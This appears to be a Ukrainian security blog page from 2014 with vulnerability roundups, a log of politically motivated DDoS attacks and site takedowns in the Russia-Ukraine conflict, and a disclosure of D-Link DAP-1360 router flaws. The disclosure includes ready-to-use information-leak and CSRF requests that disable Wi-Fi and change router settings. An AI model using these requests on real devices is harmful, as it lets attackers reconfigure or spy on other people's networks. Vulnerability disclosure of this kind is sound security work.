Websecurity - Веб безпека

У липні я дав інтерв’ю журналу Фокус. І в номері від 07.11.2014 вийшла стаття з моїм інтерв’ю, а пізніше вона була опублікована на сайті журналу.

В статті розповідається про кібер війну Росії проти України. Та про мене і мою громадську ініціативу Українські Кібер Війська, що я створив 09.06.2014, а також основних моїх помічників в УКВ.

Большая ломка. Как украинские кибервойска атакуют сепаратистов

Так що кому буде цікаво прочитати інформацію про мене та Українські Кібер Війська, як тим хто вже читав мої попередні інтерв’ю в журналі Antivirus.UA та інших журналах, так і всім іншим, можете прочитати цю статтю.

В даній добірці уразливості в веб додатках:

• HP Service Manager, Injection of Arbitrary Code, Remote Privilege Elevation, Remote Disclosure of Privileged Information and Cross Site Scripting (XSS) (деталі)
• rexx Recruitment: Cross-Site Scripting in User Registration (деталі)
• postfixadmin security update (деталі)
• Vulnerability in otrs (деталі)
• Evolution Data Server vulnerability (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах LineNity, JS External Link Info та Echelon. Для котрих з’явилися експлоіти. LineNity - це тема движка, JS External Link Info - це плагін для перетворення зовнішніх лінок на інформаційні сторінки, Echelon - це тема движка.

• WordPress LineNity Local File Inclusion (деталі)
• WordPress JS External Link Info Cross Site Scripting (деталі)
• WordPress Echelon Theme Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я писав про вересневі DDoS атаки та взломи в Україні, а зараз розповім про ситуацію у жовтні.

В зв’язку з сепаратистськими і терористичними акціями на сході України та парламентськими виборами в цьому місяці хакерська активність значно збільшилася. Відбулися наступні DDoS атаки та взломи в Інтернеті.

Проросійськими та іноземними хакерами були атаковані наступні сайти:

DDoS на tsn.ua (проросійськими хакерами) - 02.10.2014
DDoS на cvk.gov.ua (хакерами з КіберБеркуту) - 25.10.2014
yarema.info (хакерами з КіберБеркуту) - 25.10.2014
vyborkom.org (хакерами з КіберБеркуту) - 25.10.2014
mzm.zp.ua (хакерами з КіберБеркуту) - 25.10.2014

Іноземними хакерами були проведені неполітичні взломи:

Twitter акаунт “Зеркало недели” (невідомими хакерами) - 05.10.2014
snigiryevka-rada.gov.ua (хакером PaWL) - 05.10.2014
www.peremrda.gov.ua (хакером r3d_s0urc3) - 15.10.2014

Проукраїнськими хакерами були атаковані наступні сайти:

astroblduma.ru (невідомими хакерами) - 07.10.2014
www.cik-lnr.info (Українські Кібер Війська) - 30.10.2014
cikdnr.ru (українськими хакерами) - 31.10.2014
Жовтневі DDoS атаки на сайти ДНР і ЛНР

Сайти ДНР і ЛНР були атаковані неодноразово на протязі жовтня.

Українські Кібер Війська закрили наступні сайти:

Закритий сайт rus.in.ua (через скаргу хостеру) - 08.10.2014
Закритий сайт atv.odessa.ua (через скаргу хостеру) - 08.10.2014
Закритий сайт glagol.in.ua (через скаргу хостеру) - 08.10.2014
Закритий СБУ сайт cvk.com.ua (фішинг сайт ЦВК) - 25.10.2014

Виявлений витік інформації в IBM WebSphere Portal.

Уразливі версії: IBM WebSphere Portal 8.0.

Можна одержати відомості про конфігурацію.

• IBM Web Content Manager (WCM) XPath Injection (деталі)

24.05.2014

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Information Leakage та Cross-Site Request Forgery уразливості.

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

01.11.2014

Information Leakage (WASC-13):

Запит без авторизації http://192.168.0.50/index.cgi?v2=y&rq=4.

Cookie: cookie_lang=1; client_login=admin; client_password=1

Лише зі вказанням кукіса (з логіном, який є фіксованим, і довільним паролем) можна отримати достатньо інформації про пристрій (IP, MAC та інше). Це можна зробити при локальному доступі, через LAN і через Internet через XSS уразливість.

CSRF (WASC-09):

В розділі Wi-Fi - Common settings можна змінити параметри Enable Wireless, MBSSID, BSSID.

Вимкнути Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}

Увімкнути Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:true,%22mbssidNum%22:1,%22mbssidCur%22:1}

В розділі Wi-Fi - Basic settings можна змінити параметри Hide Access Point, SSID, Country, Channel, Wireless mode, Max Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

Нова версія прошивки з виправленням даних уразливостей вийде в першій половині листопада.